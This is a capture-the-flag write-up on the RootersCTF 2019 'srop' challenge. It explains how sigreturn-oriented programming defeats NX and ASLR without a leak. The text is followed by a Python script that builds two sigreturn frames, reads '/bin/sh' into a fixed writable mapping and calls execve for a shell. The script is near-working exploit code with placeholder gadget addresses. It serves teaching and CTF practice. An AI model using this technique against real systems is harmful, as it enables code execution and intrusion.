In the previous post, we took a look at a new approach that lets us use ROP without spending too much time hunting for the necessary gadgets: sigreturn oriented programming (SROP). But in that example we deliberately leaked a stack address to help us call the mprotect function.
What if there is no leaked address? Can we still bypass NX and ASLR at the same time using sigreturn?
Of course you can!
To prove it, let's solve the pwn challenge (srop) from RootersCTF 2019. The binary can be downloaded from this link: https://github.com/abs0lut3pwn4g3/RootersCTF2019-challenges/tree/master/pwn/srop
Hmmm, it seems we got a stripped binary. This means the function symbols have been removed, so it will be harder for us to understand the assembly.
When we run the program it only shows a prompt and expects some input; after we enter a value it doesn't give us anything back.
Let's load the binary into Ghidra. With a stripped binary, the first thing you need to do is find the entry() function, since it contains the location of the main function.
From the result we can see that the entry function calls "FUN_00401000()". Don't worry about the name, Ghidra generates it automatically because the symbol is stripped; all you need to know is that this is actually the main function.
Following that function, we can see that it contains two syscall instructions. Let's run it in gdb to work out what these two syscalls do: put a breakpoint right before each syscall instruction.
When we hit the breakpoint, take a look at the register values that act as the syscall number and arguments (rax selects the syscall; rdi, rsi and rdx carry the first three arguments).
The values in the registers match the prompt we were shown earlier, so we can conclude that the first syscall is write (rax = 1), the equivalent of printf here, and the second syscall is read (rax = 0), which takes our input the way scanf() would.
Let's try to crash the program by giving it a long string.
Cool, so we know that we need to provide 136 bytes of padding to take control of the program's instruction pointer. OK, so what is the strategy? We don't have any information leak that we can use to find the stack address and put our shellcode there. Remember the limitation of ASLR?
ASLR only randomizes the stack, the heap and the dynamic libraries. This binary is not position independent (its code sits at 0x401000, not at a random base), so its own segments are mapped at fixed addresses. All we need to do is find a section of the program that is not randomized and is writable, and use that area as our fake stack: we store our data there and drive everything through syscalls, so we never need an executable stack.
But where is this location you are talking about?
You can list the mappings with vmmap. Notice the first three entries in the result: these are the binary's own segments, and ASLR does not randomize them.
We will use two sigreturn frames. The first one stores "/bin/sh" in the third entry, the mapping that starts at 0x00402000 (we store the string there because that mapping is writable). Once that is done, a second frame calls execve with the address of the "/bin/sh" string we just stored as its argument.
It sounds complicated, but let's write the code first so you can understand it.
This is the first sigreturn frame. Notice that we set it up to execute the read() syscall, and the location we want to write to is 0x402040. You can choose any location as long as it is in the range 0x00402000 - 0x00403000. I chose this one because the first few bytes at the beginning of the mapping hold initialized variables (.data), so the safest place is beyond what is listed in the result below.
rsp and rbp are also pointed into that writable area, leaving enough room there to hold our input.
When we save the payload and run it against the binary, we can see that we managed to emulate the stack and call the read function.
Next, all we have to do is store the "/bin/sh\x00" string at that location and build the second sigreturn frame so that we can call execve and execute "/bin/sh".
To call execve through a syscall we need to set rax to 59 and the first argument (rdi) to the address of the path we want to execute, "/bin/sh"; the second and third arguments (rsi = argv, rdx = envp) can both be 0 (NULL), which Linux accepts.
Run the exploit and we get a shell. Really cool!
That's all for today, I hope you enjoyed this post.
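The two-stage chain described above, as an added example that is not the post's own exploit script. It builds the 248-byte amd64 sigreturn frame by hand with only the standard library (pwntools' SigreturnFrame packs exactly the same field order, so this is what `SigreturnFrame()` does for you) and lays out both stages: the overflow that turns into `read(0, 0x402040, ...)`, and the data that read() writes, which carries "/bin/sh", the next gadget address and the execve frame. The offset (136) and the scratch address (0x402040) come from the post; `SYSCALL_RET` and `SIGRETURN` are placeholder addresses and an assumption, not from the post: the chain needs a `syscall ; ret` and a way to hit `syscall` with rax == 15 (a `mov eax, 0xf ; syscall` sequence, or, when there is none, the classic trick of returning into the read() path and sending exactly 15 bytes so read()'s return value leaves rax == 15). Note that a plain `syscall` will not do for the second frame, because after the first read() rax holds the number of bytes read, not 15.

```python
import struct

# Field order of the 248-byte amd64 rt_sigreturn frame as pwntools'
# SigreturnFrame lays it out (ucontext header, saved registers, sigmask).
# The frame sits right after the gadget address on the stack: the `ret` that
# lands on the gadget pops that address, so when `syscall` runs, rsp points
# at uc_flags and the kernel restores every register from this blob.
FRAME_FIELDS = [
    "uc_flags", "&uc", "uc_stack.ss_sp", "uc_stack.ss_flags", "uc_stack.ss_size",
    "r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15",
    "rdi", "rsi", "rbp", "rbx", "rdx", "rax", "rcx", "rsp", "rip",
    "eflags", "csgsfs", "err", "trapno", "oldmask", "cr2", "&fpstate",
    "__reserved", "sigmask",
]
FRAME_SIZE = 8 * len(FRAME_FIELDS)  # 248 bytes

SYS_READ, SYS_RT_SIGRETURN, SYS_EXECVE = 0, 15, 59

# Values taken from the post: padding up to the saved rip, and a writable,
# non-randomised spot inside the binary's 0x402000-0x403000 data mapping.
OFFSET = 136
SCRATCH = 0x402040
READ_LEN = 0x200

# Placeholder gadget addresses (assumptions, not from the post). Somewhere in
# the binary's fixed text mapping there must be a plain `syscall ; ret` and an
# address that reaches `syscall` with rax == 15 (a sigreturn gadget).
SYSCALL_RET = 0x401018
SIGRETURN = 0x401020


def p64(value):
    return struct.pack("<Q", value & 0xFFFFFFFFFFFFFFFF)


def field_offset(name):
    return 8 * FRAME_FIELDS.index(name)


def build_frame(**regs):
    """Serialise a frame. Unset fields are 0 except csgsfs, which must hold the
    user code segment selector (0x33) or the kernel rejects the frame.
    &fpstate is deliberately left 0: if it is non-zero the kernel tries to
    restore FPU state from that pointer and the process dies with SIGSEGV
    instead of resuming at our rip."""
    values = dict.fromkeys(FRAME_FIELDS, 0)
    values["csgsfs"] = 0x33
    for name, val in regs.items():
        if name not in values:
            raise KeyError("unknown frame field %r" % name)
        values[name] = val
    return b"".join(p64(values[f]) for f in FRAME_FIELDS)


def read_field(frame, name):
    off = field_offset(name)
    return struct.unpack("<Q", frame[off:off + 8])[0]


def stage1():
    """Overflow -> sigreturn -> read(0, SCRATCH, READ_LEN). rsp is moved into
    the writable area so that the `ret` after the read syscall pops its next
    address from the bytes that stage2() will have written there."""
    frame = build_frame(
        rax=SYS_READ, rdi=0, rsi=SCRATCH, rdx=READ_LEN,
        rip=SYSCALL_RET,
        rsp=SCRATCH + 8,   # the qword after "/bin/sh\0" holds the next gadget
        rbp=SCRATCH + 8,
    )
    return b"A" * OFFSET + p64(SIGRETURN) + frame


def stage2():
    """Data for the read(): the path string, then the sigreturn gadget that the
    first frame's rsp points at, then the frame that performs execve()."""
    frame = build_frame(
        rax=SYS_EXECVE, rdi=SCRATCH, rsi=0, rdx=0,   # execve("/bin/sh", NULL, NULL)
        rip=SYSCALL_RET,
        rsp=SCRATCH + 0x100,
    )
    payload = b"/bin/sh\x00" + p64(SIGRETURN) + frame
    assert len(payload) <= READ_LEN, "stage 2 does not fit in the read()"
    return payload


def stage2_fits():
    """Sanity check: everything read into SCRATCH stays inside the writable
    0x402000-0x403000 mapping (the post's chosen range)."""
    return SCRATCH + len(stage2()) <= 0x403000


if __name__ == "__main__":
    # With pwntools this is: io.send(stage1()); io.send(stage2()); io.interactive()
    import sys
    sys.stdout.buffer.write(stage2() if "--stage2" in sys.argv else stage1())
```

Send both stages with `send()` rather than `sendline()`: a stray newline after stage 1 would be swallowed by the first read() and could land in the scratch area ahead of "/bin/sh". When debugging a frame that faults, the usual suspects are a non-zero `&fpstate`, a `csgsfs` that is not 0x33, and rax not being 15 at the moment the `syscall` instruction executes.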
References:
https://syedfarazabrar.com/2019-10-12-rooters-ctf-pwn-challenges/#baby-pwn